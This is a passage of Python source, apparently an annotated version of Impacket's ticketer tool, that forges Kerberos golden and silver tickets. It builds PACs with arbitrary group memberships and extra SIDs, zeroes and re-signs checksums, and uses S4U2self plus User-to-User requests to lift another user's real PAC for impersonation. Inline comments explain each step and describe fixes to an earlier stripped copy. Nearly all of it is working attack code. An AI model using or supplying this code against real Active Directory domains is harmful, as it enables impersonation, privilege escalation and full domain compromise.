    kerbdata['HomeDirectoryDrive'] = ''
    kerbdata['LogonCount'] = 500
    kerbdata['BadPasswordCount'] = 0
    kerbdata['UserId'] = int(self.__options.user_id)
    groups = self.__options.groups.split(',')
    # NOTE: str.split never returns an empty list, so the 513 fallback is
    # effectively dead code; kept for parity with the original behaviour.
    if len(groups) == 0:
        kerbdata['PrimaryGroupId'] = 513
    else:
        kerbdata['PrimaryGroupId'] = int(groups[0])
    kerbdata['GroupCount'] = len(groups)
    for group in groups:
        groupMembership = GROUP_MEMBERSHIP()
        groupId = NDRULONG()
        groupId['Data'] = int(group)
        groupMembership['RelativeId'] = groupId
        groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
        kerbdata['GroupIds'].append(groupMembership)
    kerbdata['UserFlags'] = 0
    kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    kerbdata['LogonServer'] = ''
    kerbdata['LogonDomainName'] = self.__domain.upper()
    kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid)
    kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00'
    kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD
    kerbdata['SubAuthStatus'] = 0
    kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
    kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
    kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
    kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
    kerbdata['FailedILogonCount'] = 0
    kerbdata['Reserved3'] = 0
    kerbdata['ResourceGroupDomainSid'] = NULL
    kerbdata['ResourceGroupCount'] = 0
    kerbdata['ResourceGroupIds'] = NULL
    validationInfo = VALIDATION_INFO()
    validationInfo['Data'] = kerbdata
    return validationInfo
def createBasicPac(self, kdcRep):
    """Assemble the minimal PAC buffer set for the skeleton ticket.

    Produces PAC_LOGON_INFO, zeroed server/KDC checksums whose type matches
    the ticket's encryption type, and PAC_CLIENT_INFO; optionally adds
    UPN_DNS, attributes and requestor buffers depending on the options.
    Returns a dict keyed by PAC buffer type.
    """
    pac_buffers = {}
    validation_info = self.createBasicValidationInfo()
    pac_buffers[PAC_LOGON_INFO] = validation_info.getData() + validation_info.getDataReferents()

    server_sig = PAC_SIGNATURE_DATA()
    kdc_sig = PAC_SIGNATURE_DATA()
    if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value:
        # RC4 ticket: HMAC-MD5 signatures (16 zero bytes, filled in later).
        for sig in (server_sig, kdc_sig):
            sig['SignatureType'] = ChecksumTypes.hmac_md5.value
            sig['Signature'] = b'\x00' * 16
    else:
        # AES ticket: 12-byte HMAC-SHA1-96 signatures; key size picks the type.
        if len(self.__options.aesKey) == 64:
            sig_type = ChecksumTypes.hmac_sha1_96_aes256.value
        else:
            sig_type = ChecksumTypes.hmac_sha1_96_aes128.value
        for sig in (server_sig, kdc_sig):
            sig['Signature'] = b'\x00' * 12
            sig['SignatureType'] = sig_type
    pac_buffers[PAC_SERVER_CHECKSUM] = server_sig.getData()
    pac_buffers[PAC_PRIVSVR_CHECKSUM] = kdc_sig.getData()

    client_info = PAC_CLIENT_INFO()
    client_info['Name'] = self.__target.encode('utf-16le')
    client_info['NameLength'] = len(client_info['Name'])
    pac_buffers[PAC_CLIENT_INFO_TYPE] = client_info.getData()

    if self.__options.extra_pac:
        self.createUpnDnsPac(pac_buffers)
    if self.__options.old_pac is False:
        # Modern (post-CVE-2021-42287-hardening) PACs carry these two buffers.
        self.createAttributesInfoPac(pac_buffers)
        self.createRequestorInfoPac(pac_buffers)
    return pac_buffers
def createUpnDnsPac(self, pacInfos):
    """Add a PAC_UPN_DNS_INFO buffer (UPN, DNS domain, SAM name and SID).

    Each field is UTF-16LE encoded, placed at an 8-byte-aligned offset past
    the fixed header, and padded to the next 8-byte boundary. Fix: the UPN is
    "user@domain" — the '@' separator was missing from the original f-string.
    """
    upnDnsInfo = UPN_DNS_INFO_FULL()
    PAC_pad = b'\x00' * self.getPadLength(len(upnDnsInfo))
    # UPN format is user@domain (the '@' was dropped in the original).
    upn_data = f'{self.__target.lower()}@{self.__domain.lower()}'.encode('utf-16-le')
    upnDnsInfo['UpnLength'] = len(upn_data)
    upnDnsInfo['UpnOffset'] = len(upnDnsInfo) + len(PAC_pad)
    total_len = upnDnsInfo['UpnOffset'] + upnDnsInfo['UpnLength']
    pad = self.getPadLength(total_len)
    upn_data += b'\x00' * pad
    dns_name = self.__domain.upper().encode('utf-16-le')
    upnDnsInfo['DnsDomainNameLength'] = len(dns_name)
    upnDnsInfo['DnsDomainNameOffset'] = total_len + pad
    total_len = upnDnsInfo['DnsDomainNameOffset'] + upnDnsInfo['DnsDomainNameLength']
    pad = self.getPadLength(total_len)
    dns_name += b'\x00' * pad
    # Flags = 2: the extended (SamName + Sid) form of UPN_DNS_INFO.
    upnDnsInfo['Flags'] = 2
    samName = self.__target.encode('utf-16-le')
    upnDnsInfo['SamNameLength'] = len(samName)
    upnDnsInfo['SamNameOffset'] = total_len + pad
    total_len = upnDnsInfo['SamNameOffset'] + upnDnsInfo['SamNameLength']
    pad = self.getPadLength(total_len)
    samName += b'\x00' * pad
    user_sid = SID()
    user_sid.fromCanonical(f'{self.__options.domain_sid}-{self.__options.user_id}')
    upnDnsInfo['SidLength'] = len(user_sid)
    upnDnsInfo['SidOffset'] = total_len + pad
    total_len = upnDnsInfo['SidOffset'] + upnDnsInfo['SidLength']
    pad = self.getPadLength(total_len)
    user_data = user_sid.getData() + b'\x00' * pad
    post_pac_data = upn_data + dns_name + samName + user_data
    pacInfos[PAC_UPN_DNS_INFO] = upnDnsInfo.getData() + PAC_pad + post_pac_data
def createAttributesInfoPac(self, pacInfos):
    """Add a PAC_ATTRIBUTES_INFO buffer (flags: PAC-was-requested bit set).

    Fix: restored the missing ``self`` parameter — this method is invoked as
    ``self.createAttributesInfoPac(pacInfos)`` (see createBasicPac and
    customizeTicket), which would have raised TypeError.
    """
    pacAttributes = PAC_ATTRIBUTE_INFO()
    pacAttributes['FlagsLength'] = 2
    pacAttributes['Flags'] = 1
    pacInfos[PAC_ATTRIBUTES_INFO] = pacAttributes.getData()
def createRequestorInfoPac(self, pacInfos):
    """Add a PAC_REQUESTOR buffer carrying the requesting user's full SID."""
    requestor = PAC_REQUESTOR()
    user_sid = SID()
    # Full SID = domain SID + user RID.
    user_sid.fromCanonical(f'{self.__options.domain_sid}-{self.__options.user_id}')
    requestor['UserSid'] = user_sid
    pacInfos[PAC_REQUESTOR_INFO] = requestor.getData()
def createBasicTicket(self):
    """Build the kdcRep skeleton and its PAC buffer dict.

    Two modes:
      * with -request: obtain a real TGT (and a TGS when an SPN points at a
        different service) from the KDC and use it as the basis;
      * otherwise: forge an AS_REP/TGS_REP skeleton from scratch.

    Returns (kdcRep, pacInfos), or (None, None) when the ticket's encryption
    types cannot be matched by the supplied key material.
    """
    if (self.__options.request is True):
        if (self.__domain == self.__server):
            logging.info('Requesting TGT to target domain to use as basis')
        else:
            logging.info('Requesting TGT/TGS to target domain to use as basis')
        if (self.__options.hashes is not None):
            (lmhash, nthash) = self.__options.hashes.split(':')
        else:
            lmhash = ''
            nthash = ''
        userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value)
        (tgt, cipher, oldSessionKey, sessionKey) = getKerberosTGT(userName, self.__password, self.__domain, unhexlify(lmhash), unhexlify(nthash), None, self.__options.dc_ip)
        # Keep the TGT material for the later S4U2self+U2U exchange.
        (self.__tgt, self.__tgt_cipher, self.__tgt_session_key) = (tgt, cipher, sessionKey)
        if (self.__domain == self.__server):
            kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
        else:
            serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value)
            (tgs, cipher, oldSessionKey, sessionKey) = getKerberosTGS(serverName, self.__domain, None, tgt, cipher, sessionKey)
            kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
        # Verify we hold key material matching the ciphers actually in use;
        # otherwise the ticket could not be re-signed/re-encrypted later.
        ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
        encPartCipher = int(kdcRep['enc-part']['etype'])
        if (((ticketCipher == EncryptionTypes.rc4_hmac.value) or (encPartCipher == EncryptionTypes.rc4_hmac.value)) and (self.__options.nthash is None)):
            logging.critical("rc4_hmac is used in this ticket and you haven't specified the -nthash parameter. Can't continue ( or try running again w/o the -request option)")
            return (None, None)
        if (((ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value)) and (self.__options.aesKey is None)):
            logging.critical("aes128_cts_hmac_sha1_96 is used in this ticket and you haven't specified the -aesKey parameter. Can't continue (or try running again w/o the -request option)")
            return (None, None)
        if (((ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value)) and (self.__options.aesKey is not None) and (len(self.__options.aesKey) > 32)):
            logging.critical("aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. Can't continue (or try running again w/o the -request option)")
            return (None, None)
        if (((ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value)) and (self.__options.aesKey is None)):
            logging.critical("aes256_cts_hmac_sha1_96 is used in this ticket and you haven't specified the -aesKey parameter. Can't continue (or try running again w/o the -request option)")
            return (None, None)
        if (((ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) or (encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value)) and (self.__options.aesKey is not None) and (len(self.__options.aesKey) < 64)):
            logging.critical("aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. Can't continue")
            return (None, None)
        # Rewrite the client name to the identity we are forging.
        kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
        kdcRep['cname']['name-string'] = noValue
        kdcRep['cname']['name-string'][0] = (self.__options.impersonate or self.__target)
    else:
        logging.info('Creating basic skeleton ticket and PAC Infos')
        if (self.__domain == self.__server):
            kdcRep = AS_REP()
            kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value
        else:
            kdcRep = TGS_REP()
            kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value
        kdcRep['pvno'] = 5
        if (self.__options.nthash is None):
            # AES keys are salted: advertise the ETYPE-INFO2 salt so clients
            # can derive the right key.
            kdcRep['padata'] = noValue
            kdcRep['padata'][0] = noValue
            kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value
            etype2 = ETYPE_INFO2()
            etype2[0] = noValue
            if (len(self.__options.aesKey) == 64):
                etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
            else:
                etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
            etype2[0]['salt'] = ('%s%s' % (self.__domain.upper(), self.__target))
            encodedEtype2 = encoder.encode(etype2)
            kdcRep['padata'][0]['padata-value'] = encodedEtype2
        kdcRep['crealm'] = self.__domain.upper()
        kdcRep['cname'] = noValue
        kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
        kdcRep['cname']['name-string'] = noValue
        kdcRep['cname']['name-string'][0] = self.__target
        kdcRep['ticket'] = noValue
        kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value
        kdcRep['ticket']['realm'] = self.__domain.upper()
        kdcRep['ticket']['sname'] = noValue
        kdcRep['ticket']['sname']['name-string'] = noValue
        kdcRep['ticket']['sname']['name-string'][0] = self.__service
        if (self.__domain == self.__server):
            # Golden ticket: sname is krbtgt/DOMAIN.
            kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
            kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper()
        else:
            # Silver ticket: sname is service/server.
            kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
            kdcRep['ticket']['sname']['name-string'][1] = self.__server
        kdcRep['ticket']['enc-part'] = noValue
        kdcRep['ticket']['enc-part']['kvno'] = 2
        kdcRep['enc-part'] = noValue
        if (self.__options.nthash is None):
            # Pick the AES variant matching the supplied key's hex length.
            if (len(self.__options.aesKey) == 64):
                kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
                kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
            else:
                kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
                kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
        else:
            kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
            kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
        kdcRep['enc-part']['kvno'] = 2
        kdcRep['enc-part']['cipher'] = noValue
    pacInfos = self.createBasicPac(kdcRep)
    return (kdcRep, pacInfos)
def getKerberosS4U2SelfU2U(self):
    """Perform an S4U2self + User-to-User TGS exchange against the DC.

    Uses the previously obtained TGT (self.__tgt and its session key) to ask
    the KDC for a service ticket to ourselves on behalf of the user named in
    -impersonate, with enc-tkt-in-skey (U2U) so the resulting ticket is
    encrypted under our TGT session key and can be decrypted locally.

    Returns (raw TGS reply, None, sessionKey, None) — mirrors the
    getKerberosTGS tuple shape.
    """
    tgt = self.__tgt
    cipher = self.__tgt_cipher
    sessionKey = self.__tgt_session_key
    kdcHost = self.__options.dc_ip
    decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
    # Build the AP-REQ carrying our TGT for the PA-TGS-REQ padata.
    ticket = Ticket()
    ticket.from_asn1(decodedTGT['ticket'])
    apReq = AP_REQ()
    apReq['pvno'] = 5
    apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
    opts = list()
    apReq['ap-options'] = constants.encodeFlags(opts)
    seq_set(apReq, 'ticket', ticket.to_asn1)
    authenticator = Authenticator()
    authenticator['authenticator-vno'] = 5
    authenticator['crealm'] = str(decodedTGT['crealm'])
    clientName = Principal()
    clientName.from_asn1(decodedTGT, 'crealm', 'cname')
    seq_set(authenticator, 'cname', clientName.components_to_asn1)
    now = datetime.datetime.utcnow()
    authenticator['cusec'] = now.microsecond
    authenticator['ctime'] = KerberosTime.to_asn1(now)
    if (logging.getLogger().level == logging.DEBUG):
        logging.debug('AUTHENTICATOR')
        print(authenticator.prettyPrint())
        print('\n')
    encodedAuthenticator = encoder.encode(authenticator)
    # Key Usage 7: TGS-REQ PA-TGS-REQ authenticator, under the TGT session key.
    encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
    apReq['authenticator'] = noValue
    apReq['authenticator']['etype'] = cipher.enctype
    apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
    encodedApReq = encoder.encode(apReq)
    tgsReq = TGS_REQ()
    tgsReq['pvno'] = 5
    tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
    tgsReq['padata'] = noValue
    tgsReq['padata'][0] = noValue
    tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
    tgsReq['padata'][0]['padata-value'] = encodedApReq
    # PA-FOR-USER: names the user to impersonate (S4U2self), protected by an
    # HMAC-MD5 checksum keyed with the TGT session key (key usage 17).
    clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
    S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
    S4UByteArray += ((b(self.__options.impersonate) + b(self.__domain)) + b'Kerberos')
    if (logging.getLogger().level == logging.DEBUG):
        logging.debug('S4UByteArray')
        hexdump(S4UByteArray)
    checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
    if (logging.getLogger().level == logging.DEBUG):
        logging.debug('CheckSum')
        hexdump(checkSum)
    paForUserEnc = PA_FOR_USER_ENC()
    seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
    paForUserEnc['userRealm'] = self.__domain
    paForUserEnc['cksum'] = noValue
    paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
    paForUserEnc['cksum']['checksum'] = checkSum
    paForUserEnc['auth-package'] = 'Kerberos'
    if (logging.getLogger().level == logging.DEBUG):
        logging.debug('PA_FOR_USER_ENC')
        print(paForUserEnc.prettyPrint())
    encodedPaForUserEnc = encoder.encode(paForUserEnc)
    tgsReq['padata'][1] = noValue
    tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
    tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
    reqBody = seq_set(tgsReq, 'req-body')
    opts = list()
    opts.append(constants.KDCOptions.forwardable.value)
    opts.append(constants.KDCOptions.renewable.value)
    opts.append(constants.KDCOptions.canonicalize.value)
    opts.append(constants.KDCOptions.renewable_ok.value)
    # enc-tkt-in-skey = U2U: ticket will be sealed with our TGT session key.
    opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
    reqBody['kdc-options'] = constants.encodeFlags(opts)
    # Target ourselves: sname is our own user (S4U2self).
    serverName = Principal(self.__options.user, self.__options.domain, type=constants.PrincipalNameType.NT_UNKNOWN.value)
    seq_set(reqBody, 'sname', serverName.components_to_asn1)
    reqBody['realm'] = str(decodedTGT['crealm'])
    now = (datetime.datetime.utcnow() + datetime.timedelta(days=1))
    reqBody['till'] = KerberosTime.to_asn1(now)
    reqBody['nonce'] = random.getrandbits(31)
    seq_set_iter(reqBody, 'etype', (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
    # additional-tickets carries our own TGT for the U2U exchange.
    seq_set_iter(reqBody, 'additional-tickets', (ticket.to_asn1(TicketAsn1()),))
    if (logging.getLogger().level == logging.DEBUG):
        logging.debug('Final TGS')
        print(tgsReq.prettyPrint())
    message = encoder.encode(tgsReq)
    r = sendReceive(message, self.__domain, kdcHost)
    return (r, None, sessionKey, None)
def customizeTicket(self, kdcRep, pacInfos):
    """Fill the EncTicketPart and PAC with the forged identity and lifetime.

    With -impersonate, performs S4U2self+U2U to fetch the impersonated user's
    real PAC, clears its signatures and reuses its EncTicketPart; otherwise
    the EncTicketPart is forged from scratch. PAC_LOGON_INFO, the zeroed
    checksums and PAC_CLIENT_INFO are then rewritten for the target.

    Fixes: restored the stripped 0xFFFFFFFF mask on the LogonTime low dword
    and the missing nonce constant (123456789) — both were syntax errors.

    Returns (encRepPart, encTicketPart, pacInfos); signatures are computed
    later in signEncryptTicket.
    """
    logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target))
    ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
    if self.__options.impersonate:
        logging.info("\tRequesting S4U2self+U2U to obtain %s's PAC" % self.__options.impersonate)
        (tgs, cipher, oldSessionKey, sessionKey) = self.getKerberosS4U2SelfU2U()
        logging.info('\tDecrypting ticket & extracting PAC')
        decodedTicket = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
        cipherText = decodedTicket['ticket']['enc-part']['cipher']
        newCipher = _enctype_table[int(decodedTicket['ticket']['enc-part']['etype'])]
        # Key Usage 2: ticket enc-part; U2U means it is sealed with our TGT
        # session key, so we can decrypt it locally.
        plainText = newCipher.decrypt(self.__tgt_session_key, 2, cipherText)
        encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
        adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
        pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())
        pacInfos = dict()
        buff = pacType['Buffers']
        AttributesInfoPacInS4UU2UPAC = False
        RequestorInfoPacInS4UU2UPAC = False
        logging.info('\tClearing signatures')
        for bufferN in range(pacType['cBuffers']):
            infoBuffer = pac.PAC_INFO_BUFFER(buff)
            # Offsets are relative to the start of PACTYPE; Buffers begins 8
            # bytes in (cBuffers + Version header).
            data = pacType['Buffers'][infoBuffer['Offset'] - 8:][:infoBuffer['cbBufferSize']]
            buff = buff[len(infoBuffer):]
            if infoBuffer['ulType'] in [PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM]:
                checksum = PAC_SIGNATURE_DATA(data)
                if checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
                    checksum['Signature'] = '\x00' * 12
                elif checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
                    checksum['Signature'] = '\x00' * 12
                else:
                    checksum['Signature'] = '\x00' * 16
                pacInfos[infoBuffer['ulType']] = checksum.getData()
            elif infoBuffer['ulType'] == PAC_ATTRIBUTES_INFO:
                AttributesInfoPacInS4UU2UPAC = True
                pacInfos[infoBuffer['ulType']] = data
            elif infoBuffer['ulType'] == PAC_REQUESTOR_INFO:
                RequestorInfoPacInS4UU2UPAC = True
                pacInfos[infoBuffer['ulType']] = data
            else:
                pacInfos[infoBuffer['ulType']] = data
        # Post-hardening KDCs expect these buffers; add them if the real PAC
        # did not already carry them.
        if self.__options.old_pac is False and not AttributesInfoPacInS4UU2UPAC:
            self.createAttributesInfoPac(pacInfos)
        if self.__options.old_pac is False and not RequestorInfoPacInS4UU2UPAC:
            if self.__options.user_id == '500':
                logging.warning("User ID is 500, which is Impacket's default. If you specified -user-id, you can ignore this message. If you didn't, and you get a KDC_ERR_TGT_REVOKED error when using the ticket, you will need to specify the -user-id with the RID of the target user to impersonate")
            self.createRequestorInfoPac(pacInfos)
        logging.info('\tAdding necessary ticket flags')
        originalFlags = [i for i, x in enumerate(list(encTicketPart['flags'].asBinary())) if x == '1']
        flags = originalFlags
        newFlags = [TicketFlags.forwardable.value, TicketFlags.proxiable.value, TicketFlags.renewable.value, TicketFlags.pre_authent.value]
        if self.__domain == self.__server:
            newFlags.append(TicketFlags.initial.value)
        for newFlag in newFlags:
            if newFlag not in originalFlags:
                flags.append(newFlag)
        encTicketPart['flags'] = encodeFlags(flags)
        logging.info('\tChanging keytype')
        encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
        if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
        elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
        else:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
    else:
        # No impersonation: forge the EncTicketPart from scratch.
        encTicketPart = EncTicketPart()
        flags = list()
        flags.append(TicketFlags.forwardable.value)
        flags.append(TicketFlags.proxiable.value)
        flags.append(TicketFlags.renewable.value)
        if self.__domain == self.__server:
            flags.append(TicketFlags.initial.value)
        flags.append(TicketFlags.pre_authent.value)
        encTicketPart['flags'] = encodeFlags(flags)
        encTicketPart['key'] = noValue
        encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
        if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
        elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
        else:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
        encTicketPart['crealm'] = self.__domain.upper()
        encTicketPart['cname'] = noValue
        encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
        encTicketPart['cname']['name-string'] = noValue
        encTicketPart['cname']['name-string'][0] = self.__target
        encTicketPart['transited'] = noValue
        encTicketPart['transited']['tr-type'] = 0
        encTicketPart['transited']['contents'] = ''
        encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
        encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
        encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
        encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
        encTicketPart['authorization-data'] = noValue
        encTicketPart['authorization-data'][0] = noValue
        encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
        encTicketPart['authorization-data'][0]['ad-data'] = noValue
    if PAC_LOGON_INFO in pacInfos:
        data = pacInfos[PAC_LOGON_INFO]
        validationInfo = VALIDATION_INFO()
        validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
        lenVal = len(validationInfo.getData())
        validationInfo.fromStringReferents(data, lenVal)
        aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
        unixTime = self.getFileTime(aTime)
        kerbdata = KERB_VALIDATION_INFO()
        # Restored FILETIME low/high split (the mask was stripped).
        kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xFFFFFFFF
        kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
        validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
        validationInfo['Data']['EffectiveName'] = self.__target
        groups = self.__options.groups.split(',')
        validationInfo['Data']['GroupIds'] = list()
        validationInfo['Data']['GroupCount'] = len(groups)
        for group in groups:
            groupMembership = GROUP_MEMBERSHIP()
            groupId = NDRULONG()
            groupId['Data'] = int(group)
            groupMembership['RelativeId'] = groupId
            groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
            validationInfo['Data']['GroupIds'].append(groupMembership)
        if self.__options.extra_sid is not None:
            extrasids = self.__options.extra_sid.split(',')
            if validationInfo['Data']['SidCount'] == 0:
                # UserFlags bit 5 (0x20): ExtraSids field is present and valid.
                validationInfo['Data']['UserFlags'] |= 32
                validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
            for extrasid in extrasids:
                validationInfo['Data']['SidCount'] += 1
                sidRecord = KERB_SID_AND_ATTRIBUTES()
                sid = RPC_SID()
                sid.fromCanonical(extrasid)
                sidRecord['Sid'] = sid
                sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
                validationInfo['Data']['ExtraSids'].append(sidRecord)
        else:
            validationInfo['Data']['ExtraSids'] = NULL
        validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents()
        pacInfos[PAC_LOGON_INFO] = validationInfoBlob
        if logging.getLogger().level == logging.DEBUG:
            logging.debug('VALIDATION_INFO after making it gold')
            validationInfo.dump()
            print('\n')
    else:
        raise Exception('PAC_LOGON_INFO not found! Aborting')
    logging.info('\tPAC_LOGON_INFO')
    if PAC_SERVER_CHECKSUM in pacInfos:
        serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
        if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
            serverChecksum['Signature'] = '\x00' * 12
        elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
            serverChecksum['Signature'] = '\x00' * 12
        else:
            serverChecksum['Signature'] = '\x00' * 16
        pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
    else:
        raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
    if PAC_PRIVSVR_CHECKSUM in pacInfos:
        privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
        privSvrChecksum['Signature'] = '\x00' * 12
        if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
            privSvrChecksum['Signature'] = '\x00' * 12
        elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
            privSvrChecksum['Signature'] = '\x00' * 12
        else:
            privSvrChecksum['Signature'] = '\x00' * 16
        pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
    else:
        raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
    if PAC_CLIENT_INFO_TYPE in pacInfos:
        pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
        pacClientInfo['ClientId'] = unixTime
        pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
    else:
        raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
    logging.info('\tPAC_CLIENT_INFO_TYPE')
    logging.info('\tEncTicketPart')
    if self.__domain == self.__server:
        encRepPart = EncASRepPart()
    else:
        encRepPart = EncTGSRepPart()
    encRepPart['key'] = noValue
    encRepPart['key']['keytype'] = encTicketPart['key']['keytype']
    encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']
    encRepPart['last-req'] = noValue
    encRepPart['last-req'][0] = noValue
    encRepPart['last-req'][0]['lr-type'] = 0
    encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
    # Fixed, arbitrary nonce (constant was stripped in the original).
    encRepPart['nonce'] = 123456789
    encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
    flags = []
    for i in encTicketPart['flags']:
        flags.append(i)
    encRepPart['flags'] = flags
    encRepPart['authtime'] = str(encTicketPart['authtime'])
